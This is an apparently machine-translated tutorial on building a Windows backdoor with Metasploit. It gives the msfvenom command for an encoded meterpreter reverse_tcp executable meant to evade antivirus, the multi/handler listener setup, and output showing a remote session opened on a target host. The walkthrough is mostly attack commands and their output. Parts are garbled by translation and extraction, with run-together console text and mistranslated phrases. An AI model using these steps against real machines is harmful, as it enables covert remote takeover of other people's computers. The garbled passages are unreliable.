1. The first generation of our little cutie, later to avoid the killing after the implantation of other people's computers.
[Email protected] ~]#msfvenom-p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai-i 5 lhost=192.168.1.25 lport=6666-f exe >./ Lyshark.exeNo Platform was selected, choosing Msf::module::P latform::windows from the Payloadno Arch selected, selecting Arch:x86 from the Payloadfound1compatible encodersattempting to encode payload with5Iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size368(iteration=0) X86/shikata_ga_nai succeeded with size395(iteration=1) X86/shikata_ga_nai succeeded with size422(iteration=2) X86/shikata_ga_nai succeeded with size449(iteration=3) X86/shikata_ga_nai succeeded with size476(iteration=4) X86/shikata_ga_nai chosen with final size476Payload Size:476bytesfinal size of EXEfile:73802Bytes[[email protected]~]# [[email protected]~]#lsLyshark.exe
2. Go to Metasploit and do the following:
[[Email protected] ~ ]# msfconsole This copy of Metasploit-framework is Morethan weeks old. Consider running'msfupdate'To update to the latest version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%% Percent%%%%%%%%%%% https://metasploit.com%%%%%%%%%%%%%%%%%%%%%%%%%% percent%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%=[Metasploit v4.16.55-dev- ]+ -- --=[1757Exploits-1004Auxiliary-306post]+ -- --=[536Payloads- AEncoders-TenNops]+----=[free Metasploit Pro trial:http://R-7.co/trymsp]MSF>
MSF > Use exploit/multi/ HandlerMSF exploit (multi
MSF exploit (Multi/handler) > Set Payload windows/meterpreter/ reverse_tcp= windows/meterpreter/reverse_tcp
MSF exploit (multi/handler) > Show OptionsModule options (Exploit/multi/handler): Name current Setting Required Description---- --------------- -------- -----------Payload Options (Windows/meterpreter/reverse_tcp): Name current Setting Required Description---- --------------- -------- -----------Exitfunc Process Yes Exit technique (Accepted:"', SEH, thread, process, none) Lhost Yes the listen address Lport4444Yes the listen portexploit target:id Name-- ----0Wildcard Target
MSF exploit (Multi/handler) > Set lhost 192.168.1.25192.168. 1.25 MSF exploit (multi/handler) > set lport 6666 6666
3. Use our little cutie (Lyshark.exe) in a variety of ways to run on the target host, and then see the shell rebound
MSF exploit (multi/handler) > exploit [*] Started reverse TCP handler on192.168.1.25:6666 [*] Sending stage (179779bytes) to192.168.1.10[*] Meterpreter session1Opened (192.168.1.25:6666-192.168.1.10:54264) at2018- .- Geneva Geneva: -: --0400Meterpreter>
4. Now that the host has fallen, check the system.
Meterpreter > sysinfocomputer : DESKTOP-cacduanos 14393). Architecture : X64system language:zh_cndomain 2Meterpreter : x86/
Note: This method must be run on the target host, not the brain!
Generate EXE backdoor through Metasploit, take shell